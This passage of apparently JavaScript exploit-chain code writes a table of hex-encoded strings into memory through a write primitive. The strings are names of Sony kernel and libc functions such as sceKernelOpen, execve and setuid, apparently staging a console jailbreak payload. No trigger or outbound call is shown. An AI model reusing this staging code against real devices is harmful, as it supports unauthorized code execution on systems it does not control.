2156 |   p.write4(addr.add32(0x000021a8), 0x72654b65);
2157 |   p.write4(addr.add32(0x000021ac), 0x4d6c656e);
2158 |   p.write4(addr.add32(0x000021b0), 0x69447061);
2159 |   p.write4(addr.add32(0x000021b4), 0x74636572);
2160 |   p.write4(addr.add32(0x000021b8), 0x6f6d654d);
2161 |   p.write4(addr.add32(0x000021bc), 0x73007972);
2162 |   p.write4(addr.add32(0x000021c0), 0x654b6563);
2163 |   p.write4(addr.add32(0x000021c4), 0x6c656e72);
2164 |   p.write4(addr.add32(0x000021c8), 0x74617453);
2165 |   p.write4(addr.add32(0x000021cc), 0x65637300);
2166 |   p.write4(addr.add32(0x000021d0), 0x6e72654b);
2167 |   p.write4(addr.add32(0x000021d4), 0x704f6c65);
2168 |   p.write4(addr.add32(0x000021d8), 0x73006e65);
2169 |   p.write4(addr.add32(0x000021dc), 0x654b6563);
2170 |   p.write4(addr.add32(0x000021e0), 0x6c656e72);
2171 |   p.write4(addr.add32(0x000021e4), 0x64616552);
2172 |   p.write4(addr.add32(0x000021e8), 0x65637300);
2173 |   p.write4(addr.add32(0x000021ec), 0x6e72654b);
2174 |   p.write4(addr.add32(0x000021f0), 0x734c6c65);
2175 |   p.write4(addr.add32(0x000021f4), 0x006b6565);
2176 |   p.write4(addr.add32(0x000021f8), 0x4b656373);
2177 |   p.write4(addr.add32(0x000021fc), 0x656e7265);
2178 |   p.write4(addr.add32(0x00002200), 0x6f6c436c);
2179 |   p.write4(addr.add32(0x00002204), 0x73006573);
2180 |   p.write4(addr.add32(0x00002208), 0x654b6563);
2181 |   p.write4(addr.add32(0x0000220c), 0x6c656e72);
2182 |   p.write4(addr.add32(0x00002210), 0x65656c53);
2183 |   p.write4(addr.add32(0x00002214), 0x63730070);
2184 |   p.write4(addr.add32(0x00002218), 0x72654b65);
2185 |   p.write4(addr.add32(0x0000221c), 0x556c656e);
2186 |   p.write4(addr.add32(0x00002220), 0x65656c73);
2187 |   p.write4(addr.add32(0x00002224), 0x63730070);
2188 |   p.write4(addr.add32(0x00002228), 0x72654b65);
2189 |   p.write4(addr.add32(0x0000222c), 0x476c656e);
2190 |   p.write4(addr.add32(0x00002230), 0x69747465);
2191 |   p.write4(addr.add32(0x00002234), 0x666f656d);
2192 |   p.write4(addr.add32(0x00002238), 0x00796164);
2193 |   p.write4(addr.add32(0x0000223c), 0x4b656373);
2194 |   p.write4(addr.add32(0x00002240), 0x656e7265);
2195 |   p.write4(addr.add32(0x00002244), 0x7465476c);
2196 |   p.write4(addr.add32(0x00002248), 0x636f7250);
2197 |   p.write4(addr.add32(0x0000224c), 0x54737365);
2198 |   p.write4(addr.add32(0x00002250), 0x00656d69);
2199 |   p.write4(addr.add32(0x00002254), 0x4b656373);
2200 |   p.write4(addr.add32(0x00002258), 0x656e7265);
2201 |   p.write4(addr.add32(0x0000225c), 0x7465476c);
2202 |   p.write4(addr.add32(0x00002260), 0x72727543);
2203 |   p.write4(addr.add32(0x00002264), 0x43746e65);
2204 |   p.write4(addr.add32(0x00002268), 0x73007570);
2205 |   p.write4(addr.add32(0x0000226c), 0x74637379);
2206 |   p.write4(addr.add32(0x00002270), 0x7973006c);
2207 |   p.write4(addr.add32(0x00002274), 0x6c746373);
2208 |   p.write4(addr.add32(0x00002278), 0x616e7962);
2209 |   p.write4(addr.add32(0x0000227c), 0x7300656d);
2210 |   p.write4(addr.add32(0x00002280), 0x72617379);
2211 |   p.write4(addr.add32(0x00002284), 0x65006863);
2212 |   p.write4(addr.add32(0x00002288), 0x76636578);
2213 |   p.write4(addr.add32(0x0000228c), 0x74700065);
2214 |   p.write4(addr.add32(0x00002290), 0x61657268);
2215 |   p.write4(addr.add32(0x00002294), 0x65735f64);
2216 |   p.write4(addr.add32(0x00002298), 0x7000666c);
2217 |   p.write4(addr.add32(0x0000229c), 0x65726874);
2218 |   p.write4(addr.add32(0x000022a0), 0x735f6461);
2219 |   p.write4(addr.add32(0x000022a4), 0x66617465);
2220 |   p.write4(addr.add32(0x000022a8), 0x696e6966);
2221 |   p.write4(addr.add32(0x000022ac), 0x6e5f7974);
2222 |   p.write4(addr.add32(0x000022b0), 0x63730070);
2223 |   p.write4(addr.add32(0x000022b4), 0x72654b65);
2224 |   p.write4(addr.add32(0x000022b8), 0x436c656e);
2225 |   p.write4(addr.add32(0x000022bc), 0x74616572);
2226 |   p.write4(addr.add32(0x000022c0), 0x75714565);
2227 |   p.write4(addr.add32(0x000022c4), 0x00657565);
2228 |   p.write4(addr.add32(0x000022c8), 0x4b656373);
2229 |   p.write4(addr.add32(0x000022cc), 0x656e7265);
2230 |   p.write4(addr.add32(0x000022d0), 0x6c65446c);
2231 |   p.write4(addr.add32(0x000022d4), 0x45657465);
2232 |   p.write4(addr.add32(0x000022d8), 0x75657571);
2233 |   p.write4(addr.add32(0x000022dc), 0x63730065);
2234 |   p.write4(addr.add32(0x000022e0), 0x72654b65);
2235 |   p.write4(addr.add32(0x000022e4), 0x416c656e);
2236 |   p.write4(addr.add32(0x000022e8), 0x73556464);
2237 |   p.write4(addr.add32(0x000022ec), 0x76457265);
2238 |   p.write4(addr.add32(0x000022f0), 0x00746e65);
2239 |   p.write4(addr.add32(0x000022f4), 0x4b656373);
2240 |   p.write4(addr.add32(0x000022f8), 0x656e7265);
2241 |   p.write4(addr.add32(0x000022fc), 0x6464416c);
2242 |   p.write4(addr.add32(0x00002300), 0x64616552);
2243 |   p.write4(addr.add32(0x00002304), 0x6e657645);
2244 |   p.write4(addr.add32(0x00002308), 0x65670074);
2245 |   p.write4(addr.add32(0x0000230c), 0x64697574);
2246 |   p.write4(addr.add32(0x00002310), 0x74656700);
2247 |   p.write4(addr.add32(0x00002314), 0x00646967);
2248 |   p.write4(addr.add32(0x00002318), 0x70746567);
2249 |   p.write4(addr.add32(0x0000231c), 0x73006469);
2250 |   p.write4(addr.add32(0x00002320), 0x69757465);
2251 |   p.write4(addr.add32(0x00002324), 0x65730064);
2252 |   p.write4(addr.add32(0x00002328), 0x64696774);
2253 |   p.write4(addr.add32(0x0000232c), 0x74657300);
2254 |   p.write4(addr.add32(0x00002330), 0x69756572);
2255 |   p.write4(addr.add32(0x00002334), 0x65730064);
2256 |   p.write4(addr.add32(0x00002338), 0x67657274);
2257 |   p.write4(addr.add32(0x0000233c), 0x6c006469);
2258 |   p.write4(addr.add32(0x00002340), 0x63536269);
2259 |   p.write4(addr.add32(0x00002344), 0x62694c65);
2260 |   p.write4(addr.add32(0x00002348), 0x746e4963);
2261 |   p.write4(addr.add32(0x0000234c), 0x616e7265);
2262 |   p.write4(addr.add32(0x00002350), 0x70732e6c);
2263 |   p.write4(addr.add32(0x00002354), 0x6d007872);
2264 |   p.write4(addr.add32(0x00002358), 0x6f6c6c61);
2265 |   p.write4(addr.add32(0x0000235c), 0x72660063);
2266 |   p.write4(addr.add32(0x00002360), 0x63006565);
2267 |   p.write4(addr.add32(0x00002364), 0x6f6c6c61);
2268 |   p.write4(addr.add32(0x00002368), 0x65720063);
2269 |   p.write4(addr.add32(0x0000236c), 0x6f6c6c61);
2270 |   p.write4(addr.add32(0x00002370), 0x656d0063);
2271 |   p.write4(addr.add32(0x00002374), 0x696c616d);
2272 |   p.write4(addr.add32(0x00002378), 0x6d006e67);
2273 |   p.write4(addr.add32(0x0000237c), 0x65736d65);
2274 |   p.write4(addr.add32(0x00002380), 0x656d0074);
2275 |   p.write4(addr.add32(0x00002384), 0x7970636d);
2276 |   p.write4(addr.add32(0x00002388), 0x6d656d00);
2277 |   p.write4(addr.add32(0x0000238c), 0x00706d63);
2278 |   p.write4(addr.add32(0x00002390), 0x63727473);
2279 |   p.write4(addr.add32(0x00002394), 0x73007970);
2280 |   p.write4(addr.add32(0x00002398), 0x636e7274);
2281 |   p.write4(addr.add32(0x0000239c), 0x73007970);
2282 |   p.write4(addr.add32(0x000023a0), 0x61637274);
2283 |   p.write4(addr.add32(0x000023a4), 0x74730074);
2284 |   p.write4(addr.add32(0x000023a8), 0x61636e72);
2285 |   p.write4(addr.add32(0x000023ac), 0x74730074);
2286 |   p.write4(addr.add32(0x000023b0), 0x6e656c72);
2287 |   p.write4(addr.add32(0x000023b4), 0x72747300);
2288 |   p.write4(addr.add32(0x000023b8), 0x00706d63);
2289 |   p.write4(addr.add32(0x000023bc), 0x6e727473);
2290 |   p.write4(addr.add32(0x000023c0), 0x00706d63);
2291 |   p.write4(addr.add32(0x000023c4), 0x69727073);
2292 |   p.write4(addr.add32(0x000023c8), 0x0066746e);
2293 |   p.write4(addr.add32(0x000023cc), 0x72706e73);
2294 |   p.write4(addr.add32(0x000023d0), 0x66746e69);
2295 |   p.write4(addr.add32(0x000023d4), 0x63737300);
2296 |   p.write4(addr.add32(0x000023d8), 0x00666e61);
2297 |   p.write4(addr.add32(0x000023dc), 0x63727473);
2298 |   p.write4(addr.add32(0x000023e0), 0x73007268);
2299 |   p.write4(addr.add32(0x000023e4), 0x63727274);
2300 |   p.write4(addr.add32(0x000023e8), 0x73007268);
2301 |   p.write4(addr.add32(0x000023ec), 0x74737274);
2302 |   p.write4(addr.add32(0x000023f0), 0x74730072);
2303 |   p.write4(addr.add32(0x000023f4), 0x70756472);
2304 |   p.write4(addr.add32(0x000023f8), 0x6e697200);
2305 |   p.write4(addr.add32(0x000023fc), 0x00786564);
2306 |   p.write4(addr.add32(0x00002400), 0x69647369);
2307 |   p.write4(addr.add32(0x00002404), 0x00746967);
2308 |   p.write4(addr.add32(0x00002408), 0x696f7461);
2309 |   p.write4(addr.add32(0x0000240c), 0x72747300);
2310 |   p.write4(addr.add32(0x00002410), 0x7970636c);
2311 |   p.write4(addr.add32(0x00002414), 0x72747300);
2312 |   p.write4(addr.add32(0x00002418), 0x6f727265);
2313 |   p.write4(addr.add32(0x0000241c), 0x475f0072);
2314 |   p.write4(addr.add32(0x00002420), 0x63707465);
2315 |   p.write4(addr.add32(0x00002424), 0x65707974);
2316 |   p.write4(addr.add32(0x00002428), 0x74535f00);
2317 |   p.write4(addr.add32(0x0000242c), 0x006c756f);
2318 |   p.write4(addr.add32(0x00002430), 0x706f6362);
2319 |   p.write4(addr.add32(0x00002434), 0x72730079);
2320 |   p.write4(addr.add32(0x00002438), 0x00646e61);
2321 |   p.write4(addr.add32(0x0000243c), 0x74637361);
2322 |   p.write4(addr.add32(0x00002440), 0x00656d69);
2323 |   p.write4(addr.add32(0x00002444), 0x74637361);
2324 |   p.write4(addr.add32(0x00002448), 0x5f656d69);
2325 |   p.write4(addr.add32(0x0000244c), 0x6d670072);
2326 |   p.write4(addr.add32(0x00002450), 0x656d6974);
2327 |   p.write4(addr.add32(0x00002454), 0x746d6700);
2328 |   p.write4(addr.add32(0x00002458), 0x5f656d69);
2329 |   p.write4(addr.add32(0x0000245c), 0x6f6c0073);
2330 |   p.write4(addr.add32(0x00002460), 0x746c6163);
2331 |   p.write4(addr.add32(0x00002464), 0x00656d69);
2332 |   p.write4(addr.add32(0x00002468), 0x61636f6c);
2333 |   p.write4(addr.add32(0x0000246c), 0x6d69746c);
2334 |   p.write4(addr.add32(0x00002470), 0x00725f65);
2335 |   p.write4(addr.add32(0x00002474), 0x69746b6d);
2336 |   p.write4(addr.add32(0x00002478), 0x6f00656d);
2337 |   p.write4(addr.add32(0x0000247c), 0x646e6570);
2338 |   p.write4(addr.add32(0x00002480), 0x72007269);
2339 |   p.write4(addr.add32(0x00002484), 0x64646165);
2340 |   p.write4(addr.add32(0x00002488), 0x72007269);
2341 |   p.write4(addr.add32(0x0000248c), 0x64646165);
2342 |   p.write4(addr.add32(0x00002490), 0x725f7269);
2343 |   p.write4(addr.add32(0x00002494), 0x6c657400);
2344 |   p.write4(addr.add32(0x00002498), 0x7269646c);
2345 |   p.write4(addr.add32(0x0000249c), 0x65657300);
2346 |   p.write4(addr.add32(0x000024a0), 0x7269646b);
2347 |   p.write4(addr.add32(0x000024a4), 0x77657200);
2348 |   p.write4(addr.add32(0x000024a8), 0x64646e69);
2349 |   p.write4(addr.add32(0x000024ac), 0x63007269);
2350 |   p.write4(addr.add32(0x000024b0), 0x65736f6c);
2351 |   p.write4(addr.add32(0x000024b4), 0x00726964);
2352 |   p.write4(addr.add32(0x000024b8), 0x66726964);
2353 |   p.write4(addr.add32(0x000024bc), 0x65670064);
2354 |   p.write4(addr.add32(0x000024c0), 0x6f727074);
2355 |   p.write4(addr.add32(0x000024c4), 0x6d616e67);
2356 |   p.write4(addr.add32(0x000024c8), 0x6f660065);
2357 |   p.write4(addr.add32(0x000024cc), 0x006e6570);
2358 |   p.write4(addr.add32(0x000024d0), 0x61657266);
2359 |   p.write4(addr.add32(0x000024d4), 0x77660064);
2360 |   p.write4(addr.add32(0x000024d8), 0x65746972);
2361 |   p.write4(addr.add32(0x000024dc), 0x65736600);
2362 |   p.write4(addr.add32(0x000024e0), 0x66006b65);
2363 |   p.write4(addr.add32(0x000024e4), 0x6c6c6574);
2364 |   p.write4(addr.add32(0x000024e8), 0x6c636600);
2365 |   p.write4(addr.add32(0x000024ec), 0x0065736f);
2366 |   p.write4(addr.add32(0x000024f0), 0x69727066);
2367 |   p.write4(addr.add32(0x000024f4), 0x0066746e);
2368 | }


--------------------------------------------------------------------------------